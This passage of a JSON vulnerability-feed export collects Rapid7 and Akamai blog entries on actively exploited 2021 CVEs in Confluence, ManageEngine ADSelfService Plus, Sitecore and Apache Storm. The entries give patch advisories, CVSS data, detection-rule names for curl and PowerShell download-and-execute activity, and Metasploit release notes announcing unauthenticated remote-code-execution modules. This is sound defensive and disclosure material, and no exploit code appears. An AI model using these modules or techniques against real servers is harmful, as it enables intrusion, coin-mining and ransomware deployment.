See the `Updates` section at the end of this post for new information as it comes to light._\n\nOn August 25, 2021, Atlassian [published details](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) on [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability arises from an OGNL injection flaw and allows unauthenticated attackers to execute arbitrary code on Confluence Server or Data Center instances. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nProof-of-concept exploit code has been publicly available since August 31, 2021, and both Rapid7 and community researchers have observed active exploitation as of September 2. **Organizations that have not patched this Confluence Server and Confluence Data Center vulnerability should do so on an emergency basis.**\n\nFor a complete list of fixed versions, see [Atlassian\u2019s advisory here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>).\n\nFor full vulnerability analysis, including triggers and check information, see [Rapid7\u2019s analysis in AttackerKB](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084/rapid7-analysis?referrer=blog>).\n\n## Rapid7 customers\n\nRapid7's Managed Detection and Response (MDR) team has observed active exploitation against vulnerable Confluence targets. 
InsightIDR customers should ensure that the Insight Agent is installed on all Confluence servers to maximize post-compromise detection visibility.\n\nInsightVM and Nexpose customers can assess their exposure to [CVE-2021-26084](<https://www.rapid7.com/db/vulnerabilities/atlassian-confluence-cve-2021-26084/>) with remote vulnerability checks as of the August 26, 2021 content release.\n\n## Updates\n\n**September 2, 2021:** \nThe Rapid7 Threat Detection & Response team added or updated the following detections to InsightIDR to help you identify successful exploitation of this vulnerability:\n\n * **Suspicious Process - Curl Downloading Shell Script** detects when the Curl utility is being used to download a shell script. The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.\n * **Suspicious Process - Confluence Java App Launching Processes** identifies processes being launched by the Atlassian Confluence server app. Malicious actors have been observed exploiting CVE-2021-26084, a vulnerability for Confluence disclosed in August 2021 which can allow execution of arbitrary processes.\n * **Suspicious Process - Common Compromised Linux Webserver Commands** identifies commands that Rapid7 has observed being run on compromised Linux webservers.\n\n**September 3, 2021:** \nAttacks are continuing to increase, therefore Rapid7 has updated the patching priority to "patch on an emergency basis."\n\nThe US Cyber Command has tweeted guidance asking for organizations to ["patch immediately"](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) as "this cannot wait until after the weekend."\n\nCISA has also released a [ransomware awareness guide](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) for holidays and weekends.\n\nCurrent attacks have been focused on deploying coin miners, but the pivot to deploying ransomware may not take long.\n\n**September 7, 2021:** \nAtlassian has updated their [advisory on 
CVE-2021-26084](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) to note that the vulnerability is exploitable by unauthenticated attackers _regardless of configuration._ Widespread exploitation is ongoing.", "cvss3": {}, "published": "2021-09-02T15:44:36", "type": "rapid7blog", "title": "Active Exploitation of Confluence Server & Confluence Data Center: CVE-2021-26084", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T15:44:36", "id": "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "href": "https://blog.rapid7.com/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T09:08:01", "description": "Over the weekend of November 6, 2021, Rapid7\u2019s Incident Response (IR) and Managed Detection and Response (MDR) teams began seeing opportunistic exploitation of two unrelated CVEs:\n\n * CVE-2021-40539, a REST API authentication bypass in Zoho\u2019s ManageEngine ADSelfService Plus product that [Rapid7 has previously analyzed](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). CISA [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) of attackers targeting CVE-2021-40539 in September; the vulnerability allows for unauthenticated remote code execution upon successful exploitation. 
As of November 8, 2021, Microsoft is [also warning](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) that a specific threat actor is targeting vulnerable ManageEngine ADSelfService Plus installations.\n * CVE-2021-42237, a [deserialization vulnerability](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>) in the Sitecore Experience Platform that allows for unauthenticated remote code execution [in earlier versions](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776>). The affected versions of Sitecore XP appear to be several years old and unsupported other than through extended support contracts. With that said, there seem to be a higher number of organizations with vulnerable installations than expected based on the rate of compromise Rapid7 teams have observed.\n\nAttackers appear to be targeting vulnerabilities with attacks that drop webshells and install coin miners on vulnerable targets. The majority of the compromises Rapid7\u2019s services teams have seen are the result of vulnerable Sitecore instances. Both CVEs are patched; ManageEngine ADSelfService Plus and Sitecore XP customers should prioritize fixes on an urgent basis, without waiting for regularly scheduled patch cycles.\n\n## Rapid7 customers\n\nThe following attacker behavior detections are available to InsightIDR and MDR customers and will alert security teams to webshells and powershell activity related to this attack:\n\n * Webshell - IIS Spawns CMD to Spawn PowerShell\n * Attacker Technique - PowerShell Download Cradle\n\nInsightVM and Nexpose customers can assess their exposure to Zoho ManageEngine CVE-2021-40539 with a [remote vulnerability check](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-adselfservice-plus-cve-2021-40539/>). 
Rapid7 vulnerability researchers have a full technical analysis of this vulnerability [available here](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). Our research teams are investigating the feasibility of adding a vulnerability check for Sitecore XP CVE-2021-42237. A technical analysis of this vulnerability is [available here](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>).", "cvss3": {}, "published": "2021-11-09T16:59:41", "type": "rapid7blog", "title": "Opportunistic Exploitation of Zoho ManageEngine and Sitecore CVEs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539", "CVE-2021-42237"], "modified": "2021-11-09T16:59:41", "id": "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "href": "https://blog.rapid7.com/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T19:03:33", "description": "## Self-Service Remote Code Execution\n\nThis week, our own [@wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15874>) that achieves unauthenticated remote code execution in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution for Active Directory. This new module leverages a REST API authentication bypass vulnerability identified as [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>), where an error in the REST API URL normalization routine makes it possible to bypass security filters and upload arbitrary files on the target. 
wvu\u2019s new module simply uploads a Java payload to the target and executes it, granting code execution as SYSTEM if ManageEngine ADSelfService Plus was started as a service.\n\n## Storm Alert\n\nWarning, this is not a drill! A critical unauthenticated command injection vulnerability is approaching the Nimbus service component of Apache Storm and has been given the name [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>). A new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15866>) authored by our very own [zeroSteiner](<https://github.com/zeroSteiner>) has landed and will exploit this vulnerability to get you OS command execution as the user that started the Nimbus service. Please, evacuate the area immediately!\n\n## Metasploit Community CTF 2021\n\nWe're happy to announce this year\u2019s CTF will start on Friday, December 3, 2021! Similar to last year, the game has been designed to be accessible to beginners who want to learn and connect with the community. Keep in mind that while a team can have unlimited members, only 1,000 team spots are available, and once they\u2019re gone you will have to join someone else\u2019s team. You can find the full details in our [blog post](<https://www.rapid7.com/blog/post/2021/11/16/announcing-the-2021-metasploit-community-ctf/>).\n\n## New module content (2)\n\n * [Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15866>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>) \\- This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory()` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. 
In order to be exploitable, at least one topology must have been submitted to the Storm cluster. It may be active or inactive but one must be present.\n * [ManageEngine ADSelfService Plus CVE-2021-40539](<https://github.com/rapid7/metasploit-framework/pull/15874>) by [wvu](<https://github.com/wvu-r7>), [Antoine Cervoise](<https://github.com/cervoise>), [Wilfried B\u00e9card](<https://github.com/wilfried-becard>), and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>) \\- This adds an exploit for CVE-2021-40539 which is an unauthenticated RCE within the ManageEngine ADSelfService application.\n\n## Enhancements and features\n\n * [#15887](<https://github.com/rapid7/metasploit-framework/pull/15887>) from [smashery](<https://github.com/smashery>) \\- The path expansion code has been expanded to support path-based tab completion. Users should now tab-complete things such as `cat ~/some_filenam<tab>`.\n * [#15889](<https://github.com/rapid7/metasploit-framework/pull/15889>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- An update has been made to library code so that terminal resize events are only sent if the Meterpreter client supports it. Additionally, extra feedback is now provided to users on whether or not terminal resizing is handled automatically or if they should adjust it manually.\n * [#15898](<https://github.com/rapid7/metasploit-framework/pull/15898>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Ruby 3.x removes support for `URI.encode` and `URI.escape`. This PR replaces uses of these functions in modules with calls to `URI::DEFAULT_PARSER.escape` so that Ruby 3 can run these modules instead of raising errors about missing functions.\n * [#15899](<https://github.com/rapid7/metasploit-framework/pull/15899>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This improves the user experience when `shell` is invoked from a Meterpreter session. 
Now, when the `fully_interactive_shells` feature is enabled, a message is displayed to inform the operator that a fully interactive TTY is supported. Note that you can start it by invoking `shell -it`.\n\n## Bugs fixed\n\n * [#15864](<https://github.com/rapid7/metasploit-framework/pull/15864>) from [timwr](<https://github.com/timwr>) \\- A bug has been fixed whereby the `sessions -u` command would not return an x64 Meterpreter session on an x64 Windows host, and would instead return an x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-11-17T15%3A27%3A48-06%3A00..2021-11-24T18%3A00%3A22-06%3A00%22>)\n * [Full diff 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/compare/6.1.15...6.1.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T17:21:03", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294", "CVE-2021-40539"], "modified": "2021-11-26T17:21:03", "id": "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "href": "https://blog.rapid7.com/2021/11/26/metasploit-wrap-up-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). 
We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first-generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the **Export to PDF** button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. 
She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. 
In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in [Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're 
continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-10T18:59:32", "description": "## Confluence Server OGNL Injection\n\nOur own [wvu](<https://github.com/wvu-r7>) along with 
[Jang](<https://twitter.com/testanull>) added a module that exploits an OGNL injection ([CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection>)) in Atlassian Confluence's WebWork component to execute commands as the Tomcat user. CVE-2021-26084 is a critical remote code execution vulnerability in Confluence Server and Confluence Data Center and is actively being exploited in the wild. Initial discovery of this vulnerability was by Benny Jacob (SnowyOwl).\n\n## More Enhancements\n\nIn addition to the module, we would like to highlight some of the enhancements that have been added for this release. Contributor [e2002e](<https://github.com/e2002e>) added the `OUTFILE` and `DATABASE` options to the `zoomeye_search` module, allowing users to save results to a local file or local database, along with improving the output of the module to provide better information about the target. Our own [dwelch-r7](<https://github.com/dwelch-r7>) has added support for fully interactive shells against Linux environments with `shell -it`. In order to use this functionality, users will have to enable the feature flag with `features set fully_interactive_shells true`. 
Contributor [pingport80](<https://github.com/pingport80>) has added PowerShell support for the `write_file` method that is binary safe and has also replaced explicit `cat` calls with file reads from the file library to provide broader support.\n\n## New module content (1)\n\n * [Atlassian Confluence WebWork OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/15645>) by [wvu](<https://github.com/wvu-r7>), [Benny Jacob](<https://twitter.com/bennyyjacob>), and [Jang](<https://twitter.com/testanull>), which exploits [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection?referrer=blog>) \\- This adds an exploit module targeting an OGNL injection vulnerability (CVE-2021-26084) in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.\n\n## Enhancements and features\n\n * [#15278](<https://github.com/rapid7/metasploit-framework/pull/15278>) from [e2002e](<https://github.com/e2002e>) \\- The `zoomeye_search` module has been enhanced to add the `OUTFILE` and `DATABASE` options, which allow users to save results to a local file or to the local database, respectively. Additionally, the output saved has been improved to provide better information about the target, and additional error handling has been added to better handle potential edge cases.\n * [#15522](<https://github.com/rapid7/metasploit-framework/pull/15522>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds support for fully interactive shells against Linux environments with `shell -it`. 
This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15560](<https://github.com/rapid7/metasploit-framework/pull/15560>) from [pingport80](<https://github.com/pingport80>) \\- This PR adds PowerShell support for the `write_file` method that is binary safe.\n * [#15627](<https://github.com/rapid7/metasploit-framework/pull/15627>) from [pingport80](<https://github.com/pingport80>) \\- This PR removes explicit `cat` calls and replaces them with file reads from the file library so that they have broader support.\n\n## Bugs fixed\n\n * [#15634](<https://github.com/rapid7/metasploit-framework/pull/15634>) from [maikthulhu](<https://github.com/maikthulhu>) \\- This PR fixes an issue in `exploit/multi/misc/erlang_cookie_rce` where a missing bitwise flag caused the exploit to fail in some circumstances.\n * [#15636](<https://github.com/rapid7/metasploit-framework/pull/15636>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression in datastore serialization that caused some event processing to fail.\n * [#15637](<https://github.com/rapid7/metasploit-framework/pull/15637>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression where Metasploit incorrectly marked IPv6 addresses as having an 'invalid protocol'.\n * [#15639](<https://github.com/rapid7/metasploit-framework/pull/15639>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fixes a bug in the `rename_files` method that would occur when run on a non-Windows shell session.\n * [#15640](<https://github.com/rapid7/metasploit-framework/pull/15640>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates `modules/auxiliary/gather/office365userenum.py` to require python3.\n * [#15652](<https://github.com/rapid7/metasploit-framework/pull/15652>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- A missing dependency, `py3-pip`, was preventing certain external modules such as 
`auxiliary/gather/office365userenum` from working due to `requests` requiring `py3-pip` to run properly. This has been fixed by updating the Docker container to install the missing `py3-pip` dependency.\n * [#15654](<https://github.com/rapid7/metasploit-framework/pull/15654>) from [space-r7](<https://github.com/space-r7>) \\- A bug has been fixed in `lib/msf/core/payload/windows/encrypted_reverse_tcp.rb` whereby a call to `recv()` was not being passed the proper arguments to receive the full payload before returning. This could result in cases where only part of the payload was received before continuing, which would have resulted in a crash. This has been fixed by adding a flag to the `recv()` function call to ensure it receives the entire payload before returning.\n * [#15655](<https://github.com/rapid7/metasploit-framework/pull/15655>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This cleans up the MySQL client-side options that are used within the library code.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-02T10%3A13%3A16-05%3A00..2021-09-08T18%3A07%3A57-05%3A00%22>)\n * [Full diff 6.1.3...6.1.5](<https://github.com/rapid7/metasploit-framework/compare/6.1.3...6.1.5>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-10T18:32:40", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-26804"], "modified": "2021-09-10T18:32:40", "id": "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "href": "https://blog.rapid7.com/2021/09/10/metasploit-wrap-up-129/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection--cve-2021-26084---how-a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:37:29", "description": "Recently Atlassian has disclosed a critical RCE (Remote Code Execution) vulnerability in its Confluence server and Data Center products (CVE-2021-26084), which might allow unauthenticated users to execute arbitrary code on vulnerable servers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-15T07:00:00", "type": "akamaiblog", "title": "Confluence Server Webwork OGNL Injection (CVE-2021-26084): How Akamai Helps You Protect Against Zero-Day Attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-15T07:00:00", "id": "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "href": "https://www.akamai.com/blog/security/confluence-server-webwork-ognl-injection-cve-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], 